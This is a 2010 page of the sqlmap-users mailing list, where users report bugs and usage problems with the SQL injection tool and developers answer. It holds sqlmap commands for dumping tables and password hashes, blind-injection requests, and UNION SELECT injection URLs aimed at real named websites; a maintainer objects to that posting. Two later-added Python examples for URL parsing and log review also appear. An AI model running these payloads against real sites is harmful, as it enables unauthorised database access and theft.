sqlmap-users Mailing List for sqlmap (Page 132)
From: <Bri...@gm...> - 2010-02-15 22:41:48

Hello,

I tried to dump some infos from Tables using the optional options --start and --stop, but it always gives me out the first entry till the last of the Table and not as specified starting from the 2nd till the 4th. The vulnerable site is using MySQL >= 5.0.0 so there shouldn't be a problem with using information_schema.

...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --dump -T TABLES -D information_schema --start 2 --stop 4

I tried it also with other options like this one:

...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --tables -D information_schema --start 2 --stop 4

or with the syntax from the pdf README: --start= --stop=

...\sqlmap-0.7_exe\sqlmap.exe" -u "http://www.xxxxx.php?userid=x" --dump -T TABLES -D information_schema --start=2 --stop=4

or this one:

sqlmap-0.7_exe\sqlmap.exe" -u http://www.xxxxx.php?userid=x --dump -T TABLE_NAME --start=58 --stop=98

[00:52:38] [INFO] fetching number of columns for table 'TABLE_NAME' on database 'xxx'
[00:52:38] [INFO] retrieved: 0
[00:52:55] [ERROR] unable to retrieve the number of columns for table 'TABLE_NAME' on database 'xxx'

Nothing worked. I tried also when I only used --start and no --stop. I would be really glad if you can help me.

Another question I have is about the option --passwords. For example it gives me this error message when I tried the option --passwords together with -U option:

"[ERROR] unable to retrieve the password hashes for the database users"

Why does the program try to dump it from the database "users"? I never specified it to search on this database. Does the program use it as standard DBS for the --password option and can I change it?

I would really appreciate to get any help on these questions.

From: Mauricio V. <mau...@gm...> - 2010-02-12 16:12:01

Hey,

You should also paste sqlmap's output here. I've had the same problem and found out that sometimes the id you pass to sqlmap is important and you can avoid this problem by playing with that parameter.

regards,
Mauricio

2010/2/12 Bernardo Damele A. G. <ber...@gm...>

> Hi,
>
> On Fri, Feb 12, 2010 at 14:31, <rez...@se...> wrote:
> > ...
> > http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9
> >
> > So I run these two commands:
> >
> > $ sqlmap.py -u "http://www.XXX.ZZZ.YYY/noticias_show.php?id=2868" --union-test
> >
> > and
> >
> > $ sqlmap.py -u "http://www.XXX.ZZZ/page4.php?t=129" --union-test
> >
> > In the first case, sqlmap correctly tells me that site is vulnerable to
> > union sql injection. That's good. But in the second case sqlmap tells,
> > that site isn't vulnerable to that kind of sql injection in spite of it
> > is (see the link above). These two scenarios looks to me very similar,
> > so my question is, where is the problem and why sqlmap can't find union
> > sql injection in the second case. Thank you.
>
> First of all, do NOT post real sites in the mailing list and I
> recommend you not hack random sites without written permission.
> I see from your example that you provide digits from 1 to test for
> UNION query SQL injection; sqlmap uses NULLs, maybe some field in the
> original SELECT statement can't be NULL. The detection of UNION along
> all the rest of SQL injection techniques will be totally re-engineered
> after 0.8 stable release so we will cover also this type of detection.
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: 0x05F5A30F
>
> ------------------------------------------------------------------------------
> SOLARIS 10 is the OS for Data Centers - provides features such as DTrace,
> Predictive Self Healing and Award Winning ZFS. Get Solaris 10 NOW
> http://p.sf.net/sfu/solaris-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

From: Bernardo D. A. G. <ber...@gm...> - 2010-02-12 14:39:48

Hi,

On Fri, Feb 12, 2010 at 14:31, <rez...@se...> wrote:
> ...
> http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9
>
> So I run these two commands:
>
> $ sqlmap.py -u "http://www.XXX.ZZZ.YYY/noticias_show.php?id=2868" --union-test
>
> and
>
> $ sqlmap.py -u "http://www.XXX.ZZZ/page4.php?t=129" --union-test
>
> In the first case, sqlmap correctly tells me that site is vulnerable to
> union sql injection. That's good. But in the second case sqlmap tells,
> that site isn't vulnerable to that kind of sql injection in spite of it
> is (see the link above). These two scenarios looks to me very similar,
> so my question is, where is the problem and why sqlmap can't find union
> sql injection in the second case. Thank you.

First of all, do NOT post real sites in the mailing list and I recommend you not hack random sites without written permission.

I see from your example that you provide digits from 1 to test for UNION query SQL injection; sqlmap uses NULLs, maybe some field in the original SELECT statement can't be NULL. The detection of UNION along all the rest of SQL injection techniques will be totally re-engineered after 0.8 stable release so we will cover also this type of detection.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: <rez...@se...> - 2010-02-12 14:31:19

Hello,

I've just tested sqlmap 0.7 with --union-test option and I have a question. There are two sites vuln. to SQL Injection with UNION statement:

http://www.hotlink.com.br/noticias_show.php?id=-1%20union%20all%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,%2020,21,22,23,24--

and

http://www.osa.cz/page4.php?t=-1%20UNION%20ALL%20SELECT%201,2,3,4,version%28%29,6,7,8,9

So I run these two commands:

$ sqlmap.py -u "http://www.hotlink.com.br/noticias_show.php?id=2868" --union-test

and

$ sqlmap.py -u "http://www.osa.cz/page4.php?t=129" --union-test

In the first case, sqlmap correctly tells me that site is vulnerable to union sql injection. That's good. But in the second case sqlmap tells, that site isn't vulnerable to that kind of sql injection in spite of it is (see the link above). These two scenarios looks to me very similar, so my question is, where is the problem and why sqlmap can't find union sql injection in the second case. Thank you.

From: Patrick W. <pa...@au...> - 2010-02-12 09:40:24

Perhaps, but not for a long time I'd say.

In the mean time, http://www.insomniasec.com/publications/Access-Through-Access.pdf

-Patrick

On Fri, Feb 12, 2010 at 7:54 AM, Leet Codes <lee...@gm...> wrote:
> I was wondering if support for MS Access DBMS support would be implemented
> in later versions of SQLMap?
> I received the following message when testing against a vulnerable
> application running adobe coldfusion.
>
> "[ERROR] sqlmap was not able to fingerprint the back-end database management
> system, but from the HTML error page it was possible to determinate that the
> back-end DBMS is Microsoft Access.
> Support for this DBMS will be implemented if you ask, just drop us an
> email."
>
> Here is the error message for ms access db,
> [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft
> Access Driver] Syntax error (missing operator) in query expression
> 'TEST_TEST.ID'
>
> Thank you in advanced! SQLMap rocks!

From: Miroslav S. <mir...@gm...> - 2010-02-12 09:16:40

On 11.2.2010 21:54, Leet Codes wrote:
> I was wondering if support for MS Access DBMS support would be
> implemented in later versions of SQLMap?
> I received the following message when testing against a vulnerable
> application running adobe coldfusion.

Hi.

We are currently working on a support for MS Access, but on a separate branch not available for download. When we'll see that it's ready for production phase we'll inform you. Expect it in rc/beta/stable version(s) of v0.9.

Kind regards,
Miroslav Stampar

> "[ERROR] sqlmap was not able to fingerprint the back-end database
> management system, but from the HTML error page it was possible to
> determinate that the back-end DBMS is Microsoft Access.
> Support for this DBMS will be implemented if you ask, just drop us an
> email."
>
> Here is the error message for ms access db,
> [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC
> Microsoft Access Driver] Syntax error (missing operator) in query
> expression 'TEST_TEST.ID'
>
> Thank you in advanced! SQLMap rocks!

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

From: Leet C. <lee...@gm...> - 2010-02-11 20:54:16

I was wondering if support for MS Access DBMS support would be implemented in later versions of SQLMap?
I received the following message when testing against a vulnerable application running adobe coldfusion.

"[ERROR] sqlmap was not able to fingerprint the back-end database management system, but from the HTML error page it was possible to determinate that the back-end DBMS is Microsoft Access.
Support for this DBMS will be implemented if you ask, just drop us an email."

Here is the error message for ms access db,
[Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'TEST_TEST.ID'

Thank you in advanced! SQLMap rocks!

From: Sam E. <dr...@bu...> - 2010-02-10 22:59:43

I have manually confirmed a simple 'waitfor%20delay'0:0:20'- sql injection vector in a site test, but when I try to replicate this with SQLMap using the '--time-test' option it does not even perform any 'wait for delay' type vectors as shown in the usage options. I set the verbosity to v3 and looking at the logs only the standard injection methods are tried, even though I specify the time test option and I know that it is a valid injection vector. I have tried this many times on different sites to no avail. Am I missing something?

Sam.

From: Miroslav S. <mir...@gm...> - 2010-02-10 12:08:41

Hi.

sqlmap is now updated to handle those kind of "mistakes" in a "friendly manner". Please update to the latest development version to use it ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ).

Kind regards,
Miroslav Stampar

On Wed, Feb 10, 2010 at 11:11 AM, Patrick Webster <pa...@au...> wrote:
> sqlmap should probably handle this (port is a string) in a friendly manner :)
>
> On Wed, Feb 10, 2010 at 7:43 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>> Your mistake, look at the host you provided.. two 'http://'.
>>
>> Bernardo

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

From: Patrick W. <pa...@au...> - 2010-02-10 11:15:51

sqlmap should probably handle this (port is a string) in a friendly manner :)

On Wed, Feb 10, 2010 at 7:43 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Your mistake, look at the host you provided.. two 'http://'.
>
> Bernardo

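The crash reported in this thread comes from calling int() on the empty port string that a doubled 'http://' leaves behind. A sketch of the friendlier handling asked for above, added here as an example and not sqlmap's actual patch; `parse_target_url` and `TargetUrlError` are hypothetical names, and `ww2.site` is the placeholder host from the report.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


class TargetUrlError(ValueError):
    """Carries a message meant for the user instead of a raw traceback."""


def parse_target_url(url):
    """Return (scheme, host, port, path) or raise TargetUrlError."""
    try:
        parts = urlsplit(url.strip())
    except ValueError as exc:  # e.g. a malformed bracketed IPv6 literal
        raise TargetUrlError("invalid target URL %r: %s" % (url, exc)) from exc

    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS:
        raise TargetUrlError(
            "target URL %r must start with http:// or https://" % url)

    hostport = parts.netloc.rpartition("@")[2]  # ignore any user:pass@ prefix
    if hostport.startswith("["):                # bracketed IPv6 literal
        host, _, rest = hostport[1:].partition("]")
        if rest and not rest.startswith(":"):
            raise TargetUrlError("invalid host in target URL %r" % url)
        has_port, port_text = bool(rest), rest[1:]
    else:
        host, sep, port_text = hostport.partition(":")
        has_port = bool(sep)

    # "http://http://host/x" splits into host "http", an empty port and the
    # path "//host/x": the exact input that reached int('') in the traceback.
    if host.lower() in DEFAULT_PORTS and parts.path.startswith("//"):
        raise TargetUrlError(
            "target URL %r contains the scheme twice" % url)
    if not host:
        raise TargetUrlError("target URL %r has no host name" % url)

    if not has_port:
        port = DEFAULT_PORTS[scheme]
    elif not (port_text.isascii() and port_text.isdigit()):
        raise TargetUrlError(
            "port %r in target URL %r is not a number" % (port_text, url))
    else:
        port = int(port_text)
        if not 1 <= port <= 65535:
            raise TargetUrlError(
                "port %d in target URL %r is out of range" % (port, url))

    return scheme, host, port, parts.path or "/"


if __name__ == "__main__":
    for candidate in ("http://ww2.site/index.asp",
                      "http://http://ww2.site/index.asp"):
        try:
            print(parse_target_url(candidate))
        except TargetUrlError as err:
            print("[ERROR] %s" % err)
```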
From: Miroslav S. <mir...@gm...> - 2010-02-10 09:33:08

Hi.

Thank you for your report. This problem is probably related to the connection issue(s) you may experience on your side testing that site. We've made some patches regarding this and other similar cases with proper error reporting in current development version ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ).

Kind regards,
Miroslav Stampar

On Tue, Feb 9, 2010 at 7:13 PM, Dani <lg...@gm...> wrote:
> dani@modesty:/usr/share/sqlmap$ yes "y" | sqlmap -g "inurl:index.php?id"
> sqlmap version: 0.7
> Python version: 2.6.4
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 84, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 178, in start
>     checkStability()
>   File "/usr/share/sqlmap/lib/controller/checks.py", line 304, in checkStability
>     conf.md5hash = md5hash(firstPage)
>   File "/usr/share/sqlmap/lib/core/convert.py", line 54, in md5hash
>     return md5.new(string).hexdigest()
> TypeError: md5() argument 1 must be string or read-only buffer, not None
>
> --
> Saludos
> ***********************************************
> Daniel G. Gamonal
> Sistemas de Informacion
> ***********************************************

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

From: Bernardo D. A. G. <ber...@gm...> - 2010-02-09 20:44:08

Your mistake, look at the host you provided.. two 'http://'.

Bernardo

On Tue, Feb 9, 2010 at 19:43, Otavio Augusto <ota...@gm...> wrote:
> ./sqlmap.py -u "http://http://ww2.site/index.asp" --method POST --data "txtUserName=a"
>
> sqlmap/0.8-rc6
> by Bernardo Damele A. G. <ber...@gm...>
>
> [*] starting at: 16:42:31
>
> [16:42:31] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developer will fix it as soon as
> possible:
> sqlmap version: 0.8-rc6
> Python version: 2.5.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/down/downloads/secur/sqlmap-0.8/lib/core/option.py", line 1113, in init
>     parseTargetUrl()
>   File "/down/downloads/secur/sqlmap-0.8/lib/core/common.py", line 598, in parseTargetUrl
>     conf.port = int(__hostnamePort[1])
> ValueError: invalid literal for int() with base 10: ''
>
> [*] shutting down at: 16:42:31
>
> My mistake or maybe a bug?
>
> Thank You

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Otavio A. <ota...@gm...> - 2010-02-09 19:44:23

./sqlmap.py -u "http://http://ww2.site/index.asp" --method POST --data "txtUserName=a"

sqlmap/0.8-rc6
by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 16:42:31

[16:42:31] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.8-rc6
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/down/downloads/secur/sqlmap-0.8/lib/core/option.py", line 1113, in init
    parseTargetUrl()
  File "/down/downloads/secur/sqlmap-0.8/lib/core/common.py", line 598, in parseTargetUrl
    conf.port = int(__hostnamePort[1])
ValueError: invalid literal for int() with base 10: ''

[*] shutting down at: 16:42:31

My mistake or maybe a bug?

Thank You

From: Dani <lg...@gm...> - 2010-02-09 18:13:03

dani@modesty:/usr/share/sqlmap$ yes "y" | sqlmap -g "inurl:index.php?id"
sqlmap version: 0.7
Python version: 2.6.4
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 84, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 178, in start
    checkStability()
  File "/usr/share/sqlmap/lib/controller/checks.py", line 304, in checkStability
    conf.md5hash = md5hash(firstPage)
  File "/usr/share/sqlmap/lib/core/convert.py", line 54, in md5hash
    return md5.new(string).hexdigest()
TypeError: md5() argument 1 must be string or read-only buffer, not None

--
Saludos
***********************************************
Daniel G. Gamonal
Sistemas de Informacion
***********************************************

From: Miroslav S. <mir...@gm...> - 2010-02-09 11:30:51

Hi.

Thank you for your report. This should be fixed in the latest development version (just try to update).

Kind regards.

On Tue, Feb 9, 2010 at 11:47 AM, <ds...@ds...> wrote:
> [12:45:03] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the
> command line and the following text and send by e-mail to
> sql...@li...urceforge.net. The developer will fix it as soon as possible:
> sqlmap version: 0.8-rc6
> Python version: 2.6.4
> Operating system: win32
> Traceback (most recent call last):
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\sqlmap.py", line 80, in main
>     start()
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controller\controller.py", line 257, in start
>     action()
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controller\action.py", line 138, in action
>     conf.dbmsHandler.osCmd()
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\plugins\generic\takeover.py", line 84, in osCmd
>     stackedTest()
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\techniques\outband\stacked.py", line 42, in stackedTest
>     query = getDelayQuery()
>   File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\core\common.py", line 723, in getDelayQuery
>     query = queries[kb.dbms].timedelay2 % conf.timeSec
> TypeError: not all arguments converted during string formatting
>
> [*] shutting down at: 12:45:03

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

From: <ds...@ds...> - 2010-02-09 11:14:29

[12:45:03] [ERROR] unhandled exception in sqlmap/0.8-rc6, please copy the command line and the following text and send by e-mail to sql...@li...urceforge.net. The developer will fix it as soon as possible:
sqlmap version: 0.8-rc6
Python version: 2.6.4
Operating system: win32
Traceback (most recent call last):
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\sqlmap.py", line 80, in main
    start()
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controller\controller.py", line 257, in start
    action()
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\controller\action.py", line 138, in action
    conf.dbmsHandler.osCmd()
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\plugins\generic\takeover.py", line 84, in osCmd
    stackedTest()
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\techniques\outband\stacked.py", line 42, in stackedTest
    query = getDelayQuery()
  File "F:\CREED\sqlmap-0.6.4\output\www.e-port.ru\80-e\123\sqlmap\lib\core\common.py", line 723, in getDelayQuery
    query = queries[kb.dbms].timedelay2 % conf.timeSec
TypeError: not all arguments converted during string formatting

[*] shutting down at: 12:45:03

From: Miroslav S. <mir...@gm...> - 2010-02-06 19:24:11

Hi.

Thank you for the report. This issue should be fixed in the current development version. Please get the latest version by checking it out from the repository ( svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ ).

Kind regards,
Miroslav Stampar

On 6.2.2010 19:57, David Alvarez wrote:
> Hello,
> I was executing:
>
> david@Xlaptop:~$ sqlmap -u "http://domain/app/section/section1.php?parameter=1010" -b
>
> sqlmap version: 0.7
> Python version: 2.6.2
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 84, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 263, in start
>     action()
>   File "/usr/share/sqlmap/lib/controller/action.py", line 49, in action
>     conf.dbmsHandler = setHandler()
>   File "/usr/share/sqlmap/lib/controller/handler.py", line 67, in setHandler
>     if dbmsHandler.checkDbms():
>   File "/usr/share/sqlmap/plugins/dbms/postgresql.py", line 203, in checkDbms
>     self.getBanner()
>   File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 130, in getBanner
>     setOs()
>   File "/usr/share/sqlmap/lib/core/session.py", line 191, in setOs
>     infoMsg += " Service Pack %d" % kb.osSP
> TypeError: %d format: a number is required, not NoneType

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B

From: David A. <dav...@gm...> - 2010-02-06 18:57:39

Hello,
I was executing:

david@Xlaptop:~$ sqlmap -u "http://domain/app/section/section1.php?parameter=1010" -b

sqlmap version: 0.7
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 84, in main
    start()
  File "/usr/share/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/usr/share/sqlmap/lib/controller/action.py", line 49, in action
    conf.dbmsHandler = setHandler()
  File "/usr/share/sqlmap/lib/controller/handler.py", line 67, in setHandler
    if dbmsHandler.checkDbms():
  File "/usr/share/sqlmap/plugins/dbms/postgresql.py", line 203, in checkDbms
    self.getBanner()
  File "/usr/share/sqlmap/plugins/generic/enumeration.py", line 130, in getBanner
    setOs()
  File "/usr/share/sqlmap/lib/core/session.py", line 191, in setOs
    infoMsg += " Service Pack %d" % kb.osSP
TypeError: %d format: a number is required, not NoneType

From: Bernardo D. A. G. <ber...@gm...> - 2010-01-31 10:27:35

svn checkout a new working copy will solve the problem.

On Sun, Jan 31, 2010 at 09:53, Roberto Castrogiovanni <cas...@gm...> wrote:
> Hi,
> i have a problem while "svn updating" my sqlmap version. It every times
> prompt me for a password:
>
> mordor:/sqlmap# svn update
> Saltato 'xml/banner/mssql.xml'
> Reame di autenticazione: <https://svn.sqlmap.org:443> Authentication required
> Password per 'root':
>
> May you please help me ?
>
> Thank you in advance
>
> Roberto
> --
> Computers are like air-conditioners:
> they stop working properly
> when you open Windows

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Roberto C. <cas...@gm...> - 2010-01-31 09:53:19

Hi,
i have a problem while "svn updating" my sqlmap version. It every times prompt me for a password:

mordor:/sqlmap# svn update
Saltato 'xml/banner/mssql.xml'
Reame di autenticazione: <https://svn.sqlmap.org:443> Authentication required
Password per 'root':

May you please help me ?

Thank you in advance

Roberto
--
Computers are like air-conditioners:
they stop working properly
when you open Windows

From: Bernardo f. twice! <ber...@gm...> - 2010-01-25 10:35:11

Use sqlmap from subversion repository, it has been fixed there.

Bernardo

On Wed, Jan 20, 2010 at 12:54, Reddy Hack xp <red...@ya...> wrote:
> sqlmap version: 0.7
> Python version: 2.6.1
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 84, in main
>   File "lib\controller\controller.pyc", line 263, in start
>   File "lib\controller\action.pyc", line 140, in action
>   File "plugins\generic\takeover.pyc", line 295, in osShell
>   File "plugins\generic\takeover.pyc", line 187, in __webBackdoorInit
>   File "lib\request\connect.pyc", line 131, in getPage
>   File "urllib2.pyc", line 124, in urlopen
>   File "urllib2.pyc", line 383, in open
>   File "urllib2.pyc", line 401, in _open
>   File "urllib2.pyc", line 361, in _call_chain
>   File "urllib2.pyc", line 1130, in http_open
>   File "urllib2.pyc", line 1087, in do_open
>   File "httplib.pyc", line 656, in __init__
>   File "httplib.pyc", line 668, in _set_hostport
> InvalidURL: nonnumeric port: '80\home\feldgrau'
>
> [*] shutting down at: 18:06:42
>
> C:\ll>

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Bernardo D. A. G. <ber...@gm...> - 2010-01-22 18:18:31

On Fri, Jan 22, 2010 at 08:34, Beatriz Duran <bea...@ya...> wrote:
> ...
> http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27
>
> It works, the number 1234 is shown as part of a list; is there a way to
> force sqlmap to work with UNION and avoid the testing that --use-union does?

Not yet. Test for UNION query SQL injection and detection phase in general will be totally rewritten in the next months though.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

From: Beatriz D. <bea...@ya...> - 2010-01-22 08:34:38
|
Ok, got it; now that takes me to another issue; sqlmap says that the target doesn't work with UNION: [02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability [02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value [02:24:18] [TRAFFIC OUT] HTTP request: GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1 But if I apply directly: http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27 It works, the number 1234 is shown as part of a list; is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does? I Have Learned So much from God That I can no longer Call Myself A Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much of Itself With me That I can no longer call myself A man, a woman, and angel Or even pure Soul. Love has Befriended Hafiz so completely It has turned to ash And freed Me Of every concept and image My mind has ever known. –Hafiz, Persian poet (1315 – 1390) ________________________________ From: Ignacio Hernández <nac...@gm...> To: Beatriz Duran <bea...@ya...> Sent: Thu, January 21, 2010 8:41:14 AM Subject: Re: [sqlmap-users] Fw: Which get was the right ok, that's because is a blind sql injection. you can google it to find more info about it but the bassic is tha in blind sqli you try to figure out the result of vthe query char by char. for example if the user is root, you have to first find r, then o... This is like this because in blind sql injections the database only answers "True" or "False". so you ask the database: is the first char bigger than "a"? Then it answers yea... and so on. Thats why there are so many querys, all of them needed to guess the content of the query. 
On 21/01/2010 7:37, "Beatriz Duran" <bea...@ya...> wrote:

> For example, you run:
>
> sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"
>
> After the execution you find the current user:
>
> [00:11:15] [INFO] retrieved: usqli@localhost
> [00:11:15] [DEBUG] performed 112 queries in 87 seconds
> SELECT CURRENT_USER(): 'usqli@localhost'
>
> But the results say that 112 queries were tried, like:
>
> something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1
>
> How can I know which one of the 112 got the result?
>
> ________________________________
> From: Ignacio Hernández [mailto:nac...@gm...]
> Sent: Wednesday, January 20, 2010 06:10 p.m.
> To: Duran, Beatriz
> Subject: Re: [sqlmap-users] Which get was the right
>
> HI Beatriz
>
> When you run sqlmap against a target and one of the tests succeeds, sqlmap tells yo...
>
> 2010/1/20 Duran, Beatriz
>
>> Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but...
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
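Seen from the web server's access log, the exchange above means that no single request "got the result": each request carries one true/false answer about one character. The following is an added example for log review, not code from the thread or from sqlmap; it parses requests of the shape quoted above and rebuilds the value they leaked. The log lines, client address, response sizes (5120/812) and the plain 0..127 bisection schedule are constructed assumptions, so the probe count is not sqlmap's 112.

```python
import re
from urllib.parse import quote, unquote

# URL-decoded shape of the inference request quoted in the thread:
#   ... ORD(MID((<expr>), <position>, 1)) > <threshold> AND 316=316
PROBE = re.compile(r"ORD\(MID\(\((?P<expr>.+)\), (?P<pos>\d+), 1\)\) > (?P<thr>\d+)")
ENTRY = re.compile(r'"GET (?P<path>\S+) HTTP/1\.[01]" \d{3} (?P<size>\d+)')

def parse_probes(lines, true_size):
    """Yield (position, threshold, answer) for every inference request logged."""
    for line in lines:
        entry = ENTRY.search(line)
        probe = entry and PROBE.search(unquote(entry["path"]))
        if probe:
            yield int(probe["pos"]), int(probe["thr"]), int(entry["size"]) == true_size

def reconstruct(lines, true_size):
    """Return (leaked_text, probe_count). A character is pinned once the highest
    threshold answered True is exactly one below the lowest answered False."""
    above, not_above, count = {}, {}, 0
    for pos, thr, answer in parse_probes(lines, true_size):
        count += 1
        bounds, pick, default = (above, max, -1) if answer else (not_above, min, 256)
        bounds[pos] = pick(bounds.get(pos, default), thr)
    text = "".join(
        chr(not_above[pos]) if not_above.get(pos) == above[pos] + 1 else "?"
        for pos in sorted(above)  # positions with no True answer (end probe) are skipped
    )
    return text, count

def constructed_log(value, true_size=5120, false_size=812):
    """Constructed sample input: one log line per probe, plain bisection over 0..127."""
    expr = "IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))"
    lines = []
    def log(pos, thr, answer):
        query = f"0 AND ORD(MID(({expr}), {pos}, 1)) > {thr} AND 316=316"
        lines.append('192.0.2.10 - - [21/Jan/2010:00:10:00 +0000] "GET /something/'
                     f'?departamento={quote(query)} HTTP/1.1" 200 '
                     f'{true_size if answer else false_size}')
    for pos, ch in enumerate(value, 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            log(pos, mid, ord(ch) > mid)
            lo, hi = (mid + 1, hi) if ord(ch) > mid else (lo, mid)
    log(len(value) + 1, 1, False)  # probe past the end, like position 16 in the thread
    return lines

if __name__ == "__main__":
    print(reconstruct(constructed_log("usqli@localhost"), true_size=5120))
```

On a real log the "true" response size has to be measured from a known-good request first; a burst of near-identical requests that differ only in the position and threshold numbers is itself a useful detection signal.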
From: Beatriz D. <bea...@ya...> - 2010-01-21 06:36:52
|
For example, you run:

sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"

After the execution you find the current user:

[00:11:15] [INFO] retrieved: usqli@localhost
[00:11:15] [DEBUG] performed 112 queries in 87 seconds
SELECT CURRENT_USER(): 'usqli@localhost'

But the results say that 112 queries were tried, like:

something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1

How can I know which one of the 112 got the result?

________________________________
